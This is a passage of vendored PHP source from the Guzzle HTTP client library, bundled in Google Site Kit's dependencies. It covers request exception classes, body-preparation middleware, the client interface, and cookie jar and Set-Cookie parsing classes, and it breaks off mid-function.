$request->getHeaderLine(\substr($matches[1], 11)); } elseif (\strpos($matches[1], 'res_header_') === 0) { $result = $response ? $response->getHeaderLine(\substr($matches[1], 11)) : 'NULL'; } } $cache[$matches[1]] = $result; return $result; }, $this->template); } /** * Get headers from message as string */ private function headers(\Google\Site_Kit_Dependencies\Psr\Http\Message\MessageInterface $message) : string { $result = ''; foreach ($message->getHeaders() as $name => $values) { $result .= $name . ': ' . \implode(', ', $values) . "\r\n"; } return \trim($result); } } <?php namespace Google\Site_Kit_Dependencies\GuzzleHttp\Exception; use Google\Site_Kit_Dependencies\Psr\Http\Client\NetworkExceptionInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface; /** * Exception thrown when a connection cannot be established. * * Note that no response is present for a ConnectException */ class ConnectException extends \Google\Site_Kit_Dependencies\GuzzleHttp\Exception\TransferException implements \Google\Site_Kit_Dependencies\Psr\Http\Client\NetworkExceptionInterface { /** * @var RequestInterface */ private $request; /** * @var array */ private $handlerContext; public function __construct(string $message, \Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request, ?\Throwable $previous = null, array $handlerContext = []) { parent::__construct($message, 0, $previous); $this->request = $request; $this->handlerContext = $handlerContext; } /** * Get the request that caused the exception */ public function getRequest() : \Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface { return $this->request; } /** * Get contextual information about the error from the underlying handler. * * The contents of this array will vary depending on which handler you are * using. It may also be just an empty array. Relying on this data will * couple you to a specific handler, but can give more debug information * when needed. */ public function getHandlerContext() : array { return $this->handlerContext; } } <?php namespace Google\Site_Kit_Dependencies\GuzzleHttp\Exception; class TransferException extends \RuntimeException implements \Google\Site_Kit_Dependencies\GuzzleHttp\Exception\GuzzleException { } <?php namespace Google\Site_Kit_Dependencies\GuzzleHttp\Exception; use Google\Site_Kit_Dependencies\GuzzleHttp\BodySummarizer; use Google\Site_Kit_Dependencies\GuzzleHttp\BodySummarizerInterface; use Google\Site_Kit_Dependencies\Psr\Http\Client\RequestExceptionInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface; /** * HTTP Request exception */ class RequestException extends \Google\Site_Kit_Dependencies\GuzzleHttp\Exception\TransferException implements \Google\Site_Kit_Dependencies\Psr\Http\Client\RequestExceptionInterface { /** * @var RequestInterface */ private $request; /** * @var ResponseInterface|null */ private $response; /** * @var array */ private $handlerContext; public function __construct(string $message, \Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request, ?\Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface $response = null, ?\Throwable $previous = null, array $handlerContext = []) { // Set the code of the exception if the response is set and not future. $code = $response ? $response->getStatusCode() : 0; parent::__construct($message, $code, $previous); $this->request = $request; $this->response = $response; $this->handlerContext = $handlerContext; } /** * Wrap non-RequestExceptions with a RequestException */ public static function wrapException(\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request, \Throwable $e) : \Google\Site_Kit_Dependencies\GuzzleHttp\Exception\RequestException { return $e instanceof \Google\Site_Kit_Dependencies\GuzzleHttp\Exception\RequestException ? $e : new \Google\Site_Kit_Dependencies\GuzzleHttp\Exception\RequestException($e->getMessage(), $request, null, $e); } /** * Factory method to create a new exception with a normalized error message * * @param RequestInterface $request Request sent * @param ResponseInterface $response Response received * @param \Throwable|null $previous Previous exception * @param array $handlerContext Optional handler context * @param BodySummarizerInterface|null $bodySummarizer Optional body summarizer */ public static function create(\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request, ?\Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface $response = null, ?\Throwable $previous = null, array $handlerContext = [], ?\Google\Site_Kit_Dependencies\GuzzleHttp\BodySummarizerInterface $bodySummarizer = null) : self { if (!$response) { return new self('Error completing request', $request, null, $previous, $handlerContext); } $level = (int) \floor($response->getStatusCode() / 100); if ($level === 4) { $label = 'Client error'; $className = \Google\Site_Kit_Dependencies\GuzzleHttp\Exception\ClientException::class; } elseif ($level === 5) { $label = 'Server error'; $className = \Google\Site_Kit_Dependencies\GuzzleHttp\Exception\ServerException::class; } else { $label = 'Unsuccessful request'; $className = __CLASS__; } $uri = \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Utils::redactUserInfo($request->getUri()); // Client Error: `GET /` resulted in a `404 Not Found` response: // <html> ... (truncated) $message = \sprintf('%s: `%s %s` resulted in a `%s %s` response', $label, $request->getMethod(), $uri->__toString(), $response->getStatusCode(), $response->getReasonPhrase()); $summary = ($bodySummarizer ?? new \Google\Site_Kit_Dependencies\GuzzleHttp\BodySummarizer())->summarize($response); if ($summary !== null) { $message .= ":\n{$summary}\n"; } return new $className($message, $request, $response, $previous, $handlerContext); } /** * Get the request that caused the exception */ public function getRequest() : \Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface { return $this->request; } /** * Get the associated response */ public function getResponse() : ?\Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface { return $this->response; } /** * Check if a response was received */ public function hasResponse() : bool { return $this->response !== null; } /** * Get contextual information about the error from the underlying handler. * * The contents of this array will vary depending on which handler you are * using. It may also be just an empty array. Relying on this data will * couple you to a specific handler, but can give more debug information * when needed. */ public function getHandlerContext() : array { return $this->handlerContext; } } <?php namespace Google\Site_Kit_Dependencies\GuzzleHttp\Exception; use Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface; /** * Exception when an HTTP error occurs (4xx or 5xx error) */ class BadResponseException extends \Google\Site_Kit_Dependencies\GuzzleHttp\Exception\RequestException { public function __construct(string $message, \Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request, \Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface $response, ?\Throwable $previous = null, array $handlerContext = []) { parent::__construct($message, $request, $response, $previous, $handlerContext); } /** * Current exception and the ones that extend it will always have a response. */ public function hasResponse() : bool { return \true; } /** * This function narrows the return type from the parent class and does not allow it to be nullable. */ public function getResponse() : \Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface { /** @var ResponseInterface */ return parent::getResponse(); } } <?php namespace Google\Site_Kit_Dependencies\GuzzleHttp\Exception; /** * Exception when a server error is encountered (5xx codes) */ class ServerException extends \Google\Site_Kit_Dependencies\GuzzleHttp\Exception\BadResponseException { } <?php namespace Google\Site_Kit_Dependencies\GuzzleHttp\Exception; class TooManyRedirectsException extends \Google\Site_Kit_Dependencies\GuzzleHttp\Exception\RequestException { } <?php namespace Google\Site_Kit_Dependencies\GuzzleHttp\Exception; final class InvalidArgumentException extends \InvalidArgumentException implements \Google\Site_Kit_Dependencies\GuzzleHttp\Exception\GuzzleException { } <?php namespace Google\Site_Kit_Dependencies\GuzzleHttp\Exception; /** * Exception when a client error is encountered (4xx codes) */ class ClientException extends \Google\Site_Kit_Dependencies\GuzzleHttp\Exception\BadResponseException { } <?php namespace Google\Site_Kit_Dependencies\GuzzleHttp\Exception; use Google\Site_Kit_Dependencies\Psr\Http\Client\ClientExceptionInterface; interface GuzzleException extends \Google\Site_Kit_Dependencies\Psr\Http\Client\ClientExceptionInterface { } <?php namespace Google\Site_Kit_Dependencies\GuzzleHttp; use Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface; /** * Prepares requests that contain a body, adding the Content-Length, * Content-Type, and Expect headers. * * @final */ class PrepareBodyMiddleware { /** * @var callable(RequestInterface, array): PromiseInterface */ private $nextHandler; /** * @param callable(RequestInterface, array): PromiseInterface $nextHandler Next handler to invoke. */ public function __construct(callable $nextHandler) { $this->nextHandler = $nextHandler; } public function __invoke(\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request, array $options) : \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface { $fn = $this->nextHandler; // Don't do anything if the request has no body. if ($request->getBody()->getSize() === 0) { return $fn($request, $options); } $modify = []; // Add a default content-type if possible. if (!$request->hasHeader('Content-Type')) { if ($uri = $request->getBody()->getMetadata('uri')) { if (\is_string($uri) && ($type = \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\MimeType::fromFilename($uri))) { $modify['set_headers']['Content-Type'] = $type; } } } // Add a default content-length or transfer-encoding header. if (!$request->hasHeader('Content-Length') && !$request->hasHeader('Transfer-Encoding')) { $size = $request->getBody()->getSize(); if ($size !== null) { $modify['set_headers']['Content-Length'] = $size; } else { $modify['set_headers']['Transfer-Encoding'] = 'chunked'; } } // Add the expect header if needed. $this->addExpectHeader($request, $options, $modify); return $fn(\Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Utils::modifyRequest($request, $modify), $options); } /** * Add expect header */ private function addExpectHeader(\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request, array $options, array &$modify) : void { // Determine if the Expect header should be used if ($request->hasHeader('Expect')) { return; } $expect = $options['expect'] ?? null; // Return if disabled or using HTTP/1.0 if ($expect === \false || $request->getProtocolVersion() === '1.0') { return; } // The expect header is unconditionally enabled if ($expect === \true) { $modify['set_headers']['Expect'] = '100-Continue'; return; } // By default, send the expect header when the payload is > 1mb if ($expect === null) { $expect = 1048576; } // Always add if the body cannot be rewound, the size cannot be // determined, or the size is greater than the cutoff threshold $body = $request->getBody(); $size = $body->getSize(); if ($size === null || $size >= (int) $expect || !$body->isSeekable()) { $modify['set_headers']['Expect'] = '100-Continue'; } } } <?php namespace Google\Site_Kit_Dependencies\GuzzleHttp; use Google\Site_Kit_Dependencies\GuzzleHttp\Exception\GuzzleException; use Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface; /** * Client interface for sending HTTP requests. */ interface ClientInterface { /** * The Guzzle major version. */ public const MAJOR_VERSION = 7; /** * Send an HTTP request. * * @param RequestInterface $request Request to send * @param array $options Request options to apply to the given * request and to the transfer. * * @throws GuzzleException */ public function send(\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request, array $options = []) : \Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface; /** * Asynchronously send an HTTP request. * * @param RequestInterface $request Request to send * @param array $options Request options to apply to the given * request and to the transfer. */ public function sendAsync(\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request, array $options = []) : \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface; /** * Create and send an HTTP request. * * Use an absolute path to override the base path of the client, or a * relative path to append to the base path of the client. The URL can * contain the query string as well. * * @param string $method HTTP method. * @param string|UriInterface $uri URI object or string. * @param array $options Request options to apply. * * @throws GuzzleException */ public function request(string $method, $uri, array $options = []) : \Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface; /** * Create and send an asynchronous HTTP request. * * Use an absolute path to override the base path of the client, or a * relative path to append to the base path of the client. The URL can * contain the query string as well. Use an array to provide a URL * template and additional variables to use in the URL template expansion. * * @param string $method HTTP method * @param string|UriInterface $uri URI object or string. * @param array $options Request options to apply. */ public function requestAsync(string $method, $uri, array $options = []) : \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface; /** * Get a client configuration option. * * These options include default request options of the client, a "handler" * (if utilized by the concrete client), and a "base_uri" if utilized by * the concrete client. * * @param string|null $option The config option to retrieve. * * @return mixed * * @deprecated ClientInterface::getConfig will be removed in guzzlehttp/guzzle:8.0. */ public function getConfig(?string $option = null); } <?php namespace Google\Site_Kit_Dependencies\GuzzleHttp; use Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface; interface MessageFormatterInterface { /** * Returns a formatted message string. * * @param RequestInterface $request Request that was sent * @param ResponseInterface|null $response Response that was received * @param \Throwable|null $error Exception that was received */ public function format(\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request, ?\Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface $response = null, ?\Throwable $error = null) : string; } <?php namespace Google\Site_Kit_Dependencies; // Don't redefine the functions if included multiple times. if (!\function_exists('Google\\Site_Kit_Dependencies\\GuzzleHttp\\describe_type')) { require __DIR__ . '/functions.php'; } <?php namespace Google\Site_Kit_Dependencies\GuzzleHttp\Cookie; use Google\Site_Kit_Dependencies\GuzzleHttp\Utils; /** * Persists non-session cookies using a JSON formatted file */ class FileCookieJar extends \Google\Site_Kit_Dependencies\GuzzleHttp\Cookie\CookieJar { /** * @var string filename */ private $filename; /** * @var bool Control whether to persist session cookies or not. */ private $storeSessionCookies; /** * Create a new FileCookieJar object * * @param string $cookieFile File to store the cookie data * @param bool $storeSessionCookies Set to true to store session cookies * in the cookie jar. * * @throws \RuntimeException if the file cannot be found or created */ public function __construct(string $cookieFile, bool $storeSessionCookies = \false) { parent::__construct(); $this->filename = $cookieFile; $this->storeSessionCookies = $storeSessionCookies; if (\file_exists($cookieFile)) { $this->load($cookieFile); } } /** * Saves the file when shutting down */ public function __destruct() { $this->save($this->filename); } /** * Saves the cookies to a file. * * @param string $filename File to save * * @throws \RuntimeException if the file cannot be found or created */ public function save(string $filename) : void { $json = []; /** @var SetCookie $cookie */ foreach ($this as $cookie) { if (\Google\Site_Kit_Dependencies\GuzzleHttp\Cookie\CookieJar::shouldPersist($cookie, $this->storeSessionCookies)) { $json[] = $cookie->toArray(); } } $jsonStr = \Google\Site_Kit_Dependencies\GuzzleHttp\Utils::jsonEncode($json); if (\false === \file_put_contents($filename, $jsonStr, \LOCK_EX)) { throw new \RuntimeException("Unable to save file {$filename}"); } } /** * Load cookies from a JSON formatted file. * * Old cookies are kept unless overwritten by newly loaded ones. * * @param string $filename Cookie file to load. * * @throws \RuntimeException if the file cannot be loaded. */ public function load(string $filename) : void { $json = \file_get_contents($filename); if (\false === $json) { throw new \RuntimeException("Unable to load file {$filename}"); } if ($json === '') { return; } $data = \Google\Site_Kit_Dependencies\GuzzleHttp\Utils::jsonDecode($json, \true); if (\is_array($data)) { foreach ($data as $cookie) { $this->setCookie(new \Google\Site_Kit_Dependencies\GuzzleHttp\Cookie\SetCookie($cookie)); } } elseif (\is_scalar($data) && !empty($data)) { throw new \RuntimeException("Invalid cookie file: {$filename}"); } } } <?php namespace Google\Site_Kit_Dependencies\GuzzleHttp\Cookie; use Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface; /** * Stores HTTP cookies. * * It extracts cookies from HTTP requests, and returns them in HTTP responses. * CookieJarInterface instances automatically expire contained cookies when * necessary. Subclasses are also responsible for storing and retrieving * cookies from a file, database, etc. * * @see https://docs.python.org/2/library/cookielib.html Inspiration * * @extends \IteratorAggregate<SetCookie> */ interface CookieJarInterface extends \Countable, \IteratorAggregate { /** * Create a request with added cookie headers. * * If no matching cookies are found in the cookie jar, then no Cookie * header is added to the request and the same request is returned. * * @param RequestInterface $request Request object to modify. * * @return RequestInterface returns the modified request. */ public function withCookieHeader(\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request) : \Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface; /** * Extract cookies from an HTTP response and store them in the CookieJar. * * @param RequestInterface $request Request that was sent * @param ResponseInterface $response Response that was received */ public function extractCookies(\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request, \Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface $response) : void; /** * Sets a cookie in the cookie jar. * * @param SetCookie $cookie Cookie to set. * * @return bool Returns true on success or false on failure */ public function setCookie(\Google\Site_Kit_Dependencies\GuzzleHttp\Cookie\SetCookie $cookie) : bool; /** * Remove cookies currently held in the cookie jar. * * Invoking this method without arguments will empty the whole cookie jar. * If given a $domain argument only cookies belonging to that domain will * be removed. If given a $domain and $path argument, cookies belonging to * the specified path within that domain are removed. If given all three * arguments, then the cookie with the specified name, path and domain is * removed. * * @param string|null $domain Clears cookies matching a domain * @param string|null $path Clears cookies matching a domain and path * @param string|null $name Clears cookies matching a domain, path, and name */ public function clear(?string $domain = null, ?string $path = null, ?string $name = null) : void; /** * Discard all sessions cookies. * * Removes cookies that don't have an expire field or a have a discard * field set to true. To be called when the user agent shuts down according * to RFC 2965. */ public function clearSessionCookies() : void; /** * Converts the cookie jar to an array. */ public function toArray() : array; } <?php namespace Google\Site_Kit_Dependencies\GuzzleHttp\Cookie; use Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface; /** * Cookie jar that stores cookies as an array */ class CookieJar implements \Google\Site_Kit_Dependencies\GuzzleHttp\Cookie\CookieJarInterface { /** * @var SetCookie[] Loaded cookie data */ private $cookies = []; /** * @var bool */ private $strictMode; /** * @param bool $strictMode Set to true to throw exceptions when invalid * cookies are added to the cookie jar. * @param array $cookieArray Array of SetCookie objects or a hash of * arrays that can be used with the SetCookie * constructor */ public function __construct(bool $strictMode = \false, array $cookieArray = []) { $this->strictMode = $strictMode; foreach ($cookieArray as $cookie) { if (!$cookie instanceof \Google\Site_Kit_Dependencies\GuzzleHttp\Cookie\SetCookie) { $cookie = new \Google\Site_Kit_Dependencies\GuzzleHttp\Cookie\SetCookie($cookie); } $this->setCookie($cookie); } } /** * Create a new Cookie jar from an associative array and domain. * * @param array $cookies Cookies to create the jar from * @param string $domain Domain to set the cookies to */ public static function fromArray(array $cookies, string $domain) : self { $cookieJar = new self(); foreach ($cookies as $name => $value) { $cookieJar->setCookie(new \Google\Site_Kit_Dependencies\GuzzleHttp\Cookie\SetCookie(['Domain' => $domain, 'Name' => $name, 'Value' => $value, 'Discard' => \true])); } return $cookieJar; } /** * Evaluate if this cookie should be persisted to storage * that survives between requests. * * @param SetCookie $cookie Being evaluated. * @param bool $allowSessionCookies If we should persist session cookies */ public static function shouldPersist(\Google\Site_Kit_Dependencies\GuzzleHttp\Cookie\SetCookie $cookie, bool $allowSessionCookies = \false) : bool { if ($cookie->getExpires() || $allowSessionCookies) { if (!$cookie->getDiscard()) { return \true; } } return \false; } /** * Finds and returns the cookie based on the name * * @param string $name cookie name to search for * * @return SetCookie|null cookie that was found or null if not found */ public function getCookieByName(string $name) : ?\Google\Site_Kit_Dependencies\GuzzleHttp\Cookie\SetCookie { foreach ($this->cookies as $cookie) { if ($cookie->getName() !== null && \strcasecmp($cookie->getName(), $name) === 0) { return $cookie; } } return null; } public function toArray() : array { return \array_map(static function (\Google\Site_Kit_Dependencies\GuzzleHttp\Cookie\SetCookie $cookie) : array { return $cookie->toArray(); }, $this->getIterator()->getArrayCopy()); } public function clear(?string $domain = null, ?string $path = null, ?string $name = null) : void { if (!$domain) { $this->cookies = []; return; } elseif (!$path) { $this->cookies = \array_filter($this->cookies, static function (\Google\Site_Kit_Dependencies\GuzzleHttp\Cookie\SetCookie $cookie) use($domain) : bool { return !$cookie->matchesDomain($domain); }); } elseif (!$name) { $this->cookies = \array_filter($this->cookies, static function (\Google\Site_Kit_Dependencies\GuzzleHttp\Cookie\SetCookie $cookie) use($path, $domain) : bool { return !($cookie->matchesPath($path) && $cookie->matchesDomain($domain)); }); } else { $this->cookies = \array_filter($this->cookies, static function (\Google\Site_Kit_Dependencies\GuzzleHttp\Cookie\SetCookie $cookie) use($path, $domain, $name) { return !($cookie->getName() == $name && $cookie->matchesPath($path) && $cookie->matchesDomain($domain)); }); } } public function clearSessionCookies() : void { $this->cookies = \array_filter($this->cookies, static function (\Google\Site_Kit_Dependencies\GuzzleHttp\Cookie\SetCookie $cookie) : bool { return !$cookie->getDiscard() && $cookie->getExpires(); }); } public function setCookie(\Google\Site_Kit_Dependencies\GuzzleHttp\Cookie\SetCookie $cookie) : bool { // If the name string is empty (but not 0), ignore the set-cookie // string entirely. $name = $cookie->getName(); if (!$name && $name !== '0') { return \false; } // Only allow cookies with set and valid domain, name, value $result = $cookie->validate(); if ($result !== \true) { if ($this->strictMode) { throw new \RuntimeException('Invalid cookie: ' . $result); } $this->removeCookieIfEmpty($cookie); return \false; } // Resolve conflicts with previously set cookies foreach ($this->cookies as $i => $c) { // Two cookies are identical, when their path, and domain are // identical. if ($c->getPath() != $cookie->getPath() || $c->getDomain() != $cookie->getDomain() || $c->getName() != $cookie->getName()) { continue; } // The previously set cookie is a discard cookie and this one is // not so allow the new cookie to be set if (!$cookie->getDiscard() && $c->getDiscard()) { unset($this->cookies[$i]); continue; } // If the new cookie's expiration is further into the future, then // replace the old cookie if ($cookie->getExpires() > $c->getExpires()) { unset($this->cookies[$i]); continue; } // If the value has changed, we better change it if ($cookie->getValue() !== $c->getValue()) { unset($this->cookies[$i]); continue; } // The cookie exists, so no need to continue return \false; } $this->cookies[] = $cookie; return \true; } public function count() : int { return \count($this->cookies); } /** * @return \ArrayIterator<int, SetCookie> */ public function getIterator() : \ArrayIterator { return new \ArrayIterator(\array_values($this->cookies)); } public function extractCookies(\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request, \Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface $response) : void { if ($cookieHeader = $response->getHeader('Set-Cookie')) { foreach ($cookieHeader as $cookie) { $sc = \Google\Site_Kit_Dependencies\GuzzleHttp\Cookie\SetCookie::fromString($cookie); if (!$sc->getDomain()) { $sc->setDomain($request->getUri()->getHost()); } if (0 !== \strpos($sc->getPath(), '/')) { $sc->setPath($this->getCookiePathFromRequest($request)); } if (!$sc->matchesDomain($request->getUri()->getHost())) { continue; } // Note: At this point `$sc->getDomain()` being a public suffix should // be rejected, but we don't want to pull in the full PSL dependency. $this->setCookie($sc); } } } /** * Computes cookie path following RFC 6265 section 5.1.4 * * @see https://datatracker.ietf.org/doc/html/rfc6265#section-5.1.4 */ private function getCookiePathFromRequest(\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request) : string { $uriPath = $request->getUri()->getPath(); if ('' === $uriPath) { return '/'; } if (0 !== \strpos($uriPath, '/')) { return '/'; } if ('/' === $uriPath) { return '/'; } $lastSlashPos = \strrpos($uriPath, '/'); if (0 === $lastSlashPos || \false === $lastSlashPos) { return '/'; } return \substr($uriPath, 0, $lastSlashPos); } public function withCookieHeader(\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request) : \Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface { $values = []; $uri = $request->getUri(); $scheme = $uri->getScheme(); $host = $uri->getHost(); $path = $uri->getPath() ?: '/'; foreach ($this->cookies as $cookie) { if ($cookie->matchesPath($path) && $cookie->matchesDomain($host) && !$cookie->isExpired() && (!$cookie->getSecure() || $scheme === 'https')) { $values[] = $cookie->getName() . '=' . $cookie->getValue(); } } return $values ? $request->withHeader('Cookie', \implode('; ', $values)) : $request; } /** * If a cookie already exists and the server asks to set it again with a * null value, the cookie must be deleted. */ private function removeCookieIfEmpty(\Google\Site_Kit_Dependencies\GuzzleHttp\Cookie\SetCookie $cookie) : void { $cookieValue = $cookie->getValue(); if ($cookieValue === null || $cookieValue === '') { $this->clear($cookie->getDomain(), $cookie->getPath(), $cookie->getName()); } } } <?php namespace Google\Site_Kit_Dependencies\GuzzleHttp\Cookie; /** * Persists cookies in the client session */ class SessionCookieJar extends \Google\Site_Kit_Dependencies\GuzzleHttp\Cookie\CookieJar { /** * @var string session key */ private $sessionKey; /** * @var bool Control whether to persist session cookies or not. */ private $storeSessionCookies; /** * Create a new SessionCookieJar object * * @param string $sessionKey Session key name to store the cookie * data in session * @param bool $storeSessionCookies Set to true to store session cookies * in the cookie jar. */ public function __construct(string $sessionKey, bool $storeSessionCookies = \false) { parent::__construct(); $this->sessionKey = $sessionKey; $this->storeSessionCookies = $storeSessionCookies; $this->load(); } /** * Saves cookies to session when shutting down */ public function __destruct() { $this->save(); } /** * Save cookies to the client session */ public function save() : void { $json = []; /** @var SetCookie $cookie */ foreach ($this as $cookie) { if (\Google\Site_Kit_Dependencies\GuzzleHttp\Cookie\CookieJar::shouldPersist($cookie, $this->storeSessionCookies)) { $json[] = $cookie->toArray(); } } $_SESSION[$this->sessionKey] = \json_encode($json); } /** * Load the contents of the client session into the data array */ protected function load() : void { if (!isset($_SESSION[$this->sessionKey])) { return; } $data = \json_decode($_SESSION[$this->sessionKey], \true); if (\is_array($data)) { foreach ($data as $cookie) { $this->setCookie(new \Google\Site_Kit_Dependencies\GuzzleHttp\Cookie\SetCookie($cookie)); } } elseif (\strlen($data)) { throw new \RuntimeException('Invalid cookie data'); } } } <?php namespace Google\Site_Kit_Dependencies\GuzzleHttp\Cookie; /** * Set-Cookie object */ class SetCookie { /** * @var array */ private static $defaults = ['Name' => null, 'Value' => null, 'Domain' => null, 'Path' => '/', 'Max-Age' => null, 'Expires' => null, 'Secure' => \false, 'Discard' => \false, 'HttpOnly' => \false]; /** * @var array Cookie data */ private $data; /** * Create a new SetCookie object from a string. * * @param string $cookie Set-Cookie header string */ public static function fromString(string $cookie) : self { // Create the default return array $data = self::$defaults; // Explode the cookie string using a series of semicolons $pieces = \array_filter(\array_map('trim', \explode(';', $cookie))); // The name of the cookie (first kvp) must exist and include an equal sign. if (!isset($pieces[0]) || \strpos($pieces[0], '=') === \false) { return new self($data); } // Add the cookie pieces into the parsed data array foreach ($pieces as $part) { $cookieParts = \explode('=', $part, 2); $key = \trim($cookieParts[0]); $value = isset($cookieParts[1]) ? \trim($cookieParts[1], " \n\r\t\x00\v") : \true; // Only check for non-cookies when cookies have been found if (!isset($data['Name'])) { $data['Name'] = $key; $data['Value'] = $value; } else { foreach (\array_keys(self::$defaults) as $search) { if (!\strcasecmp($search, $key)) { if ($search === 'Max-Age') { if (\is_numeric($value)) { $data[$search] = (int) $value; } } else { $data[$search] = $value; } continue 2; } } $data[$key] = $value; } } return new self($data); } /** * @param array $data Array of cookie data provided by a Cookie parser */ public function __construct(array $data = []) { $this->data = self::$defaults; if (isset($data['Name'])) { $this->setName($data['Name']); } if (isset($data['Value'])) { $this->setValue($data['Value']); } if (isset($data['Domain'])) { $this->setDomain($data['Domain']); } if (isset($data['Path'])) { $this->setPath($data['Path']); } if (isset($data['Max-Age'])) { $this->setMaxAge($data['Max-Age']); } if (isset($data['Expires'])) { $this->setExpires($data['Expires']); } if (isset($data['Secure'])) { $this->setSecure($data['Secure']); } if (isset($data['Discard'])) { $this->setDiscard($data['Discard']); } if (isset($data['HttpOnly'])) { $this->setHttpOnly($data['HttpOnly']); } // Set the remaining values that don't have extra validation logic foreach (\array_diff(\array_keys($data), \array_keys(self::$defaults)) as $key) { $this->data[$key] = $data[$key]; } // Extract the Expires value and turn it into a UNIX timestamp if needed if (!$this->getExpires() && $this->getMaxAge()) { // Calculate the Expires date $this->setExpires(\time() + $this->getMaxAge()); } elseif (null !== ($expires = $this->getExpires()) && !\is_numeric($expires)) { $this->setExpires($expires); } } public function __toString() { $str = $this->data['Name'] . '=' . ($this->data['Value'] ?? '') . '; '; foreach ($this->data as $k => $v) { if ($k !== 'Name' && $k !== 'Value' && $v !== null && $v !== \false) { if ($k === 'Expires') { $str .= 'Expires=' . \gmdate('D, d M Y H:i:s \\G\\M\\T', $v) . '; '; } else { $str .= ($v === \true ? $k : "{$k}={$v}") . '; '; } } } return \rtrim($str, '; '); } public function toArray() : array { return $this->data; } /** * Get the cookie name. * * @return string */ public function getName() { return $this->data['Name']; } /** * Set the cookie name. * * @param string $name Cookie name */ public function setName($name) : void { if (!\is_string($name)) { trigger_deprecation('guzzlehttp/guzzle', '7.4', 'Not passing a string to %s::%s() is deprecated and will cause an error in 8.0.', __CLASS__, __FUNCTION__); } $this->data['Name'] = (string) $name; } /** * Get the cookie value. * * @return string|null */ public function getValue() { return $this->data['Value']; } /** * Set the cookie value. * * @param string $value Cookie value */ public function setValue($value) : void { if (!\is_string($value)) { trigger_deprecation('guzzlehttp/guzzle', '7.4', 'Not passing a string to %s::%s() is deprecated and will cause an error in 8.0.', __CLASS__, __FUNCTION__); } $this->data['Value'] = (string) $value; } /** * Get the domain. * * @return string|null */ public function getDomain() { return $this->data['Domain']; } /** * Set the domain of the cookie. * * @param string|null $domain */ public function setDomain($domain) : void { if (!\is_string($domain) && null !== $domain) { trigger_deprecation('guzzlehttp/guzzle', '7.4', 'Not passing a string or null to %s::%s() is deprecated and will cause an error in 8.0.', __CLASS__, __FUNCTION__); } $this->data['Domain'] = null === $domain ? null : (string) $domain; } /** * Get the path. * * @return string */ public function getPath() { return $this->data['Path']; } /** * Set the path of the cookie. * * @param string $path Path of the cookie */ public function setPath($path) : void { if (!\is_string($path)) { trigger_deprecation('guzzlehttp/guzzle', '7.4', 'Not passing a string to %s::%s() is deprecated and will cause an error in 8.0.', __CLASS__, __FUNCTION__); } $this->data['Path'] = (string) $path; } /** * Maximum lifetime of the cookie in seconds. * * @return int|null */ public function getMaxAge() { return null === $this->data['Max-Age'] ? null : (int) $this->data['Max-Age']; } /** * Set the max-age of the cookie. * * @param int|null $maxAge Max age of the cookie in seconds */ public function setMaxAge($maxAge) : void { if (!\is_int($maxAge) && null !== $maxAge) { trigger_deprecation('guzzlehttp/guzzle', '7.4', 'Not passing an int or null to %s::%s() is deprecated and will cause an error in 8.0.', __CLASS__, __FUNCTION__); } $this->data['Max-Age'] = $maxAge === null ? null : (int) $maxAge; } /** * The UNIX timestamp when the cookie Expires. * * @return string|int|null */ public function getExpires() { return $this->data['Expires']; } /** * Set the unix timestamp for which the cookie will expire. * * @param int|string|null $timestamp Unix timestamp or any English textual datetime description. */ public function setExpires($timestamp) : void { if (!\is_int($timestamp) && !\is_string($timestamp) && null !== $timestamp) { 